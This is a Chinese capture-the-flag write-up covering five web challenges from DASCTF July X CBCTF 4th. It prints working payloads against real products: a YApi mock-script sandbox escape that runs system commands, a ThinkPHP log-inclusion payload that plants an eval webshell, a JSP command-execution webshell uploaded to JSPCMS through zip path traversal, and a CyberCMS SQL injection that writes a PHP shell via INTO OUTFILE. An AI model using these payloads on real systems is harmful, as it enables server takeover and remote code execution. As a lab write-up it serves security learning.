[PHP知识库]DASCTF July X CBCTF 4th web部分WP

DASCTF July X CBCTF 4th web部分WP

ezrce

Yapi远程命令执行漏洞

YAPI使用mock数据/脚本作为中间交互层，其中mock数据通过设定固定数据返回固定内容，对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容，本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令过滤，用户可以添加任何请求处理脚本，因此可以在脚本中植入命令，等用户访问接口发起请求时触发命令执行。

全局脚本

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

这里修改execSync函数中的参数，即可拿到flag

catflag

题目给的源码非常简短，但是如果一开始没有读取到日志文件，是拿不到flag的

<?php

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    if (!preg_match('/flag/i',$cmd))
    {
        $cmd = escapeshellarg($cmd);
        system('cat ' . $cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>

通过插件wappalyzer可以发现，该页面的服务器是nginx。于是cmd传入 cmd=../../../var/log/nginx/access.log

由于escapeshellarg函数，这里可以传入fla%8ag绕d过正则匹配。同时escapeshellarg会过滤掉%8a这个字符，就可以

读取到flag

thinkphp

相关漏洞链接：https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

这里为了避免url编码，用burpsuite抓包，然后修改url

首先构造Payload：/index.php?m=Home&c=Index&a=index&test=--> <?=phpinfo();?>

构造攻击请求：/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_08_01 .log

测试成功，这里写入了phpinfo，那么同样可以写入一句话木马了

改下Payload：/index.php?m=Home&c=Index&a=index&test=--><?=eval($_POST[1]);?>，继续用burp发包，蚁剑连接即可

JSPCMS

先登录后台，用户名admin，无密码登录，找到文件管理处，上传文件，这里根据这篇文章来构造上传的 压缩包

记一次由追踪溯源发现的“不安全解压getshell” - 安全客，安全资讯平台 (anquanke.com)

打造如下结构的压缩包即可

上传文件并解压后，会引发目录穿越，从而跳出spring上下文的限制，进而访问到恶意文件

贴一个jsp木马

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
请求：shell.jsp?pwd=023&i=ls

Cybercms

通过登录框sql注入写shell，用漏洞的exp打一下，成功写入文件，用蚁剑连接后根目录下得到flag

详见https://www.cnblogs.com/yuzly/p/11423384.html

本题有轻微改动
user=-1'/**/uni union on/**/selselectect/**/1,2,3,4,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e/**/into/**/outoutfilefile/**/'/var/www/html/shell.php'%23&password=123&code=&submit=true&submit.x=40&submit.y=51